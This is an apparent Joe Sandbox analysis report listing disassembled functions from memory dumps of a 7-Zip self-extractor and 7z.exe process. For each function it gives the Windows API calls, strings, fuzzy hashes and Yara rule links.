Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 3043669009-0
Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59

Function 004077FE Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
GetSystemMetrics.USER32(00000031), ref: 0040784B
CreateFontIndirectW.GDI32(?), ref: 0040785A
DeleteObject.GDI32(00000000), ref: 00407889

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55

Function 00408D01 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00408D3B
GetClientRect.USER32(?,?), ref: 00408D4D
PtInRect.USER32(?,?,?), ref: 00408D5C

Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771

CallNextHookEx.USER32(?,?,?), ref: 00408D7E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19

Function 00404412 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E

??3@YAXPAX@Z.MSVCRT(?,?,?,0041A834,0041A83C), ref: 0040445E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041A834,0041A83C), ref: 00404466
SetWindowTextW.USER32(?,?), ref: 00404473
??3@YAXPAX@Z.MSVCRT(?), ref: 0040447E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94

Function 00408079 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00408094
CreateFontIndirectW.GDI32(?), ref: 004080AA
GetDlgItem.USER32(?,000004B5), ref: 004080BE
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29

Function 0040B980 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC

Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
Part of subcall function 0040B7A0: memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
Part of subcall function 0040B7A0: memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4

Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D

Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B937

Strings

$A, xrefs: 0040B99D
$A, xrefs: 0040B9B5

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
String ID: $A$$A
API String ID: 2633840989-464203494
Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE

Function 00402083 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00402088
GetWindowRect.USER32(?,?), ref: 004020A1
ScreenToClient.USER32(00000000,?), ref: 004020AF
ScreenToClient.USER32(00000000,?), ref: 004020B6

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72

Function 00405B1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 004041B2: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
Part of subcall function 004041B2: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
Part of subcall function 004041B2: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
Part of subcall function 004041B2: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264

Part of subcall function 0040426D: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
Part of subcall function 0040426D: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
Part of subcall function 0040426D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
Part of subcall function 0040426D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F

Part of subcall function 00404328: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
Part of subcall function 00404328: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
Part of subcall function 00404328: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
Part of subcall function 00404328: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA

Part of subcall function 004043E3: ??3@YAXPAX@Z.MSVCRT(?,?,0041EA24,%%P,?,?,?,?,004068AF,00000000,?,?,?,00000000,?,?), ref: 0040440A

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00405BF0

Part of subcall function 00403573: GetEnvironmentVariableW.KERNEL32(00405B88,?,00000001,@xk,00000000,0041E9F4,?,?,00405B88,?,?,?,?,?,?), ref: 00403589
Part of subcall function 00403573: GetEnvironmentVariableW.KERNEL32(00405B88,00000000,?,00000001,00000002,?,?,00405B88,?,?,?,?,?,?), ref: 004035B5

Part of subcall function 00402E67: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
Part of subcall function 00402E67: ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1

??3@YAXPAX@Z.MSVCRT(?,?,006BC5D0,?,?,?,@xk,?,0041E9F4,?,0041E9E8,?,?,?), ref: 00405BD4

Strings

@xk, xrefs: 00405B50, 00405B58, 00405BAC

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$Environment$Variable$ExpandStrings
String ID: @xk
API String ID: 2352103411-2992447484
Opcode ID: 0fc42ad2346dd96400584fa8a52dff08f8f4bd3ce6a79bee651992793847b6e3
Instruction ID: 5a5f7ada3690be9ed35744854c3d9f8c637ff9779f5873f4f6476592ce7075f4
Opcode Fuzzy Hash: 0fc42ad2346dd96400584fa8a52dff08f8f4bd3ce6a79bee651992793847b6e3
Instruction Fuzzy Hash: 4B21B1B5E0010DBACF10EBE6DC86CDEB77CEB44749B40447BBA10B7191D638A6458BA8

Function 004052DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A

wsprintfW.USER32 ref: 00405364
??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041B828,?), ref: 004053A1

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 0040535E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X
API String ID: 1174869416-1993364030
Opcode ID: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
Opcode Fuzzy Hash: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88

Function 00403573 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(00405B88,?,00000001,@xk,00000000,0041E9F4,?,?,00405B88,?,?,?,?,?,?), ref: 00403589
GetEnvironmentVariableW.KERNEL32(00405B88,00000000,?,00000001,00000002,?,?,00405B88,?,?,?,?,?,?), ref: 004035B5

Strings

@xk, xrefs: 00403579

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: EnvironmentVariable
String ID: @xk
API String ID: 1431749950-2992447484
Opcode ID: 2f1ff9fc528912b0e10712799614b2aa743664b2d7e1fe8a040f814f0975f4f3
Instruction ID: bbc4494d80111050cd1f91c8b26a7ce20f596597211df7139f6e7ea90369f56c
Opcode Fuzzy Hash: 2f1ff9fc528912b0e10712799614b2aa743664b2d7e1fe8a040f814f0975f4f3
Instruction Fuzzy Hash: F3F06272200118BFDB11AF99DC419AEB7EDEF48764B10802BF945D72A0DBB4ED008B94

Function 00408645 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 0040867A
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004086A2

Strings

(%d%s), xrefs: 00408674

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@wsprintf
String ID: (%d%s)
API String ID: 3815514257-2087557067
Opcode ID: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
Opcode Fuzzy Hash: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98

Function 004033E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(?), ref: 004033F1
GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E

Strings

j4@, xrefs: 0040340A

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: TextWindow$Length
String ID: j4@
API String ID: 1006428111-2012685699
Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95

Function 0040474E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C

Strings

Could not allocate memory, xrefs: 00404755
7-Zip SFX, xrefs: 00404750

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D

Analysis Process: 7z.exePID: 1888, Parent PID: 3808COMMON

Executed Functions

Function 00218817 Relevance: 130.3, APIs: 62, Strings: 12, Instructions: 780COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00218826
GetStdHandle.KERNEL32 ref: 0021887D
GetConsoleScreenBufferInfo.KERNELBASE ref: 0021888E
_CxxThrowException.MSVCRT ref: 002189BD

Strings

Unsupported archive type, xrefs: 00218AAD, 00218BB8
, xrefs: 00218FD6
KSNFMGOPBELH, xrefs: 00218CDC, 00218D4A
Libs:, xrefs: 00218C5B
offset=, xrefs: 00218ECF
Hashers:, xrefs: 002192B6
7-Zip cannot find the code that works with archives., xrefs: 00218A54
7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0021881F
Codecs:, xrefs: 0021903E
|| , xrefs: 00218F0B
Can't load module: , xrefs: 00218A04
Formats:, xrefs: 00218CC7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
API String ID: 3442115484-272389550
Opcode ID: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
Instruction ID: 9539176c3f457f9e5108b4fef13b5db2fddadbb57c360f80ebc189044a5f6f56
Opcode Fuzzy Hash: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
Instruction Fuzzy Hash: 7872B472214AC196DB74EF25E5943EE73A1F7A8B80F408122DBAA47758DF3CC599CB40

Function 001F24C0 Relevance: 102.2, APIs: 81, Instructions: 981COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F26E4
free.MSVCRT ref: 001F26EF
free.MSVCRT ref: 001F274F
free.MSVCRT ref: 001F275A
free.MSVCRT ref: 001F27FF
free.MSVCRT ref: 001F2807
free.MSVCRT ref: 001F2818
free.MSVCRT ref: 001F2826
free.MSVCRT ref: 001F2831
free.MSVCRT ref: 001F2869
free.MSVCRT ref: 001F2871
free.MSVCRT ref: 001F2882
free.MSVCRT ref: 001F2951
free.MSVCRT ref: 001F295C
free.MSVCRT ref: 001F2A36
free.MSVCRT ref: 001F2A3E
free.MSVCRT ref: 001F2A52
free.MSVCRT ref: 001F2A6C
free.MSVCRT ref: 001F2A77
free.MSVCRT ref: 001F2B8F
free.MSVCRT ref: 001F2B97
free.MSVCRT ref: 001F2BA8
free.MSVCRT ref: 001F2BB6
free.MSVCRT ref: 001F2BC1
free.MSVCRT ref: 001F2C12
free.MSVCRT ref: 001F2C1D
free.MSVCRT ref: 001F2C30
free.MSVCRT ref: 001F2C3B
free.MSVCRT ref: 001F2C4E
free.MSVCRT ref: 001F2C59
free.MSVCRT ref: 001F2C6C
free.MSVCRT ref: 001F2C77
free.MSVCRT ref: 001F2CA7
free.MSVCRT ref: 001F2CAF
free.MSVCRT ref: 001F2CBB
free.MSVCRT ref: 001F2CC9
free.MSVCRT ref: 001F2CD4
free.MSVCRT ref: 001F2D10
free.MSVCRT ref: 001F2D18
free.MSVCRT ref: 001F2D29
free.MSVCRT ref: 001F2D37
free.MSVCRT ref: 001F2D42
free.MSVCRT ref: 001F2E6E
free.MSVCRT ref: 001F2E79
free.MSVCRT ref: 001F2EA6
free.MSVCRT ref: 001F2EB1
free.MSVCRT ref: 001F2F03
free.MSVCRT ref: 001F2F0E
free.MSVCRT ref: 001F2F97
free.MSVCRT ref: 001F2F9F
free.MSVCRT ref: 001F2FAD
free.MSVCRT ref: 001F2FC2
free.MSVCRT ref: 001F2FCD
free.MSVCRT ref: 001F300C
free.MSVCRT ref: 001F3017
free.MSVCRT ref: 001F3027
free.MSVCRT ref: 001F3032
free.MSVCRT ref: 001F3042
free.MSVCRT ref: 001F304D
free.MSVCRT ref: 001F305E
free.MSVCRT ref: 001F31EB
free.MSVCRT ref: 001F31F6
free.MSVCRT ref: 001F321C
free.MSVCRT ref: 001F3227

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

free.MSVCRT ref: 001F325A
free.MSVCRT ref: 001F3262

Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339

free.MSVCRT ref: 001F3270
free.MSVCRT ref: 001F329E
free.MSVCRT ref: 001F32A6
free.MSVCRT ref: 001F32D9
free.MSVCRT ref: 001F32E1
free.MSVCRT ref: 001F32F1
free.MSVCRT ref: 001F33E5
free.MSVCRT ref: 001F3445
free.MSVCRT ref: 001F3455
free.MSVCRT ref: 001F3464
free.MSVCRT ref: 001F3472
free.MSVCRT ref: 001F3490
free.MSVCRT ref: 001F349E
free.MSVCRT ref: 001F34BC
free.MSVCRT ref: 001F34CA

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
